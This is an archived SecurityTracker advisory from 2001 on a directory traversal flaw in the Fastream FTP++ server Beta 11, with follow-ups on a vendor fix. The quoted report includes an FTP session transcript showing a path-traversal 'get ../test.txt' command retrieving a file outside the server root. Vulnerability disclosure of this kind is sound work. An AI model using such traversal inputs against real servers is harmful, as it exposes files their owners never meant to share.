SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FTP++ (Fastream) Vendors:   Fastream Technologies
Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory
SecurityTracker Alert ID:  1000989
SecurityTracker URL:  http://securitytracker.com/id/1000989
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 6 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): Beta 11
Description:   The Fastream Technologies Windows-based FTP++ server contains a vulnerability that allows authorized users to remotely access files and directories outside of the server's root directory. In addition, the server provides the user with real path names instead of virtual path names.

A transcript of a vulnerable session is contained in the original report.

The author has reportedly been contacted.

Impact:   An authorized user with remote or local access to the FTP++ daemon can obtain files outside of the server's root directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.fastream.com/ftppp.htm (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory
This is a follow-up message in which SNS Reasearch reports that this was fixed in an earlier beta (tested by SNS Research), however the fix apparently wasn't incorporated in the latest version.
Re: Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory
The vendor indicates that the problem has been fixed and that the fixed release (Beta 12) will be available in approximately one week.



 Source Message Contents

Subject:  Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability


Faststram FTP built in server responds with the real 
path of directory
instead of a virtual one.It is possible to get files 
outside of root.dir.

e:\crap was used as root directory

1. directory path

230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.

2. getting files from outside of root

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 
bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden 
438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution:
no quick fix possible.Use with care.

Author has been contacted on 04.Mar.2001

se00020@fhs-hagenberg.ac.at
se00020@lion.cc

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC